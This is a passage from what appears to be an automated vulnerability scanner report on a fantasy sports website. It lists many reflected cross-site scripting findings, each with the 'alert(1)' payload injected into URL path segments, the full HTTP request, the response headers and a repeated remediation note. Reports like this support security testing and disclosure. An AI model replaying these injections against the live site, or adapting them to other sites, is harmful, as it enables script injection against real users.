HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:44 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4751 Keep-Alive: timeout=5, max=54 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b6c3'%3balert(1)//2f41834a1e4 was submitted in the REST URL parameter 1. This input was echoed as 4b6c3';alert(1)//2f41834a1e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /help4b6c3'%3balert(1)//2f41834a1e4 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4749 Keep-Alive: timeout=5, max=52 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d585e'%3balert(1)//c78635bdeb7 was submitted in the REST URL parameter 1. This input was echoed as d585e';alert(1)//c78635bdeb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iphoned585e'%3balert(1)//c78635bdeb7 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:51 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4751 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46c5d'%3balert(1)//acc3ebce0bb was submitted in the REST URL parameter 1. This input was echoed as 46c5d';alert(1)//acc3ebce0bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jobs46c5d'%3balert(1)//acc3ebce0bb HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:56 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4749 Keep-Alive: timeout=5, max=68 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17cf9'%3balert(1)//6b24ea74037 was submitted in the REST URL parameter 1. This input was echoed as 17cf9';alert(1)//6b24ea74037 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb17cf9'%3balert(1)//6b24ea74037/most-added-dropped HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:06 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4767 Keep-Alive: timeout=5, max=37 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e467'%3balert(1)//2a9f54d1b14 was submitted in the REST URL parameter 2. This input was echoed as 5e467';alert(1)//2a9f54d1b14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb/most-added-dropped5e467'%3balert(1)//2a9f54d1b14 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:06 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4783 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa51a'%3balert(1)//fd4c0aad613 was submitted in the REST URL parameter 1. This input was echoed as fa51a';alert(1)//fd4c0aad613 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlbfa51a'%3balert(1)//fd4c0aad613/news HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4753 Keep-Alive: timeout=5, max=43 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2becc'%3balert(1)//52ca4059d96 was submitted in the REST URL parameter 2. This input was echoed as 2becc';alert(1)//52ca4059d96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mlb/news2becc'%3balert(1)//52ca4059d96 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:59 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4769 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e3f'%3balert(1)//808cf0ed815 was submitted in the REST URL parameter 1. This input was echoed as c7e3f';alert(1)//808cf0ed815 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /must-signinc7e3f'%3balert(1)//808cf0ed815 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:59 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4756 Keep-Alive: timeout=5, max=35 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 148cd'%3balert(1)//4cd99bb2be was submitted in the REST URL parameter 1. This input was echoed as 148cd';alert(1)//4cd99bb2be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba148cd'%3balert(1)//4cd99bb2be/most-added-dropped HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:06 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4766 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaab2'%3balert(1)//a9ea4e2d320 was submitted in the REST URL parameter 2. This input was echoed as aaab2';alert(1)//a9ea4e2d320 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/most-added-droppedaaab2'%3balert(1)//a9ea4e2d320 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:07 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4824 Keep-Alive: timeout=5, max=46 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a65ea'%3balert(1)//621b24d0ff5 was submitted in the REST URL parameter 1. This input was echoed as a65ea';alert(1)//621b24d0ff5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nbaa65ea'%3balert(1)//621b24d0ff5/news HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:02 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4753 Keep-Alive: timeout=5, max=13 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b741'%3balert(1)//2d7f1c89381 was submitted in the REST URL parameter 2. This input was echoed as 7b741';alert(1)//2d7f1c89381 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nba/news7b741'%3balert(1)//2d7f1c89381 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4810 Keep-Alive: timeout=5, max=44 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35b81'%3balert(1)//cf6f6e25687 was submitted in the REST URL parameter 1. This input was echoed as 35b81';alert(1)//cf6f6e25687 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl35b81'%3balert(1)//cf6f6e25687/ HTTP/1.1 Host: www.fleaflicker.com Proxy-Connection: keep-alive Referer: http://www.fleaflicker.com/nfl/news Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523993474-New%7C1355595993474%3B%20s_nrgvo%3DNew%7C1355595993476%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Player%25252520News%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/%252526ot%25253DA%3B
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:37 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 ntCoent-Length: 4755 Content-Length: 4755
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cda34'%3balert(1)//b912e0d0d11 was submitted in the REST URL parameter 1. This input was echoed as cda34';alert(1)//b912e0d0d11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nflcda34'%3balert(1)//b912e0d0d11/boxscore HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:35 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4757 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5729'%3balert(1)//684c2e23c02 was submitted in the REST URL parameter 2. This input was echoed as a5729';alert(1)//684c2e23c02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/boxscorea5729'%3balert(1)//684c2e23c02 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:37 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4771 Keep-Alive: timeout=5, max=77 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971be'%3balert(1)//23f95009e1b was submitted in the REST URL parameter 1. This input was echoed as 971be';alert(1)//23f95009e1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl971be'%3balert(1)//23f95009e1b/leaders HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:56 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4756 Keep-Alive: timeout=5, max=47 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed5b5'%3balert(1)//c2940ad40a1 was submitted in the REST URL parameter 2. This input was echoed as ed5b5';alert(1)//c2940ad40a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/leadersed5b5'%3balert(1)//c2940ad40a1 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4770 Keep-Alive: timeout=5, max=45 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff4a'%3balert(1)//9781b566d73 was submitted in the REST URL parameter 1. This input was echoed as 8ff4a';alert(1)//9781b566d73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl8ff4a'%3balert(1)//9781b566d73/most-added-dropped?tableOffset=20 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:46 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4767 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97f55'%3balert(1)//386f49016da was submitted in the REST URL parameter 2. This input was echoed as 97f55';alert(1)//386f49016da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/most-added-dropped97f55'%3balert(1)//386f49016da?tableOffset=20 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:47 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4781 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fabe'%3balert(1)//82f8e90fb61 was submitted in the REST URL parameter 1. This input was echoed as 6fabe';alert(1)//82f8e90fb61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl6fabe'%3balert(1)//82f8e90fb61/must-signin HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4760 Keep-Alive: timeout=5, max=50 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78241'%3balert(1)//ba5f290f92 was submitted in the REST URL parameter 2. This input was echoed as 78241';alert(1)//ba5f290f92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/must-signin78241'%3balert(1)//ba5f290f92 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:34 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4773 Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f59'%3balert(1)//f2a4a9d583b was submitted in the REST URL parameter 1. This input was echoed as 99f59';alert(1)//f2a4a9d583b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
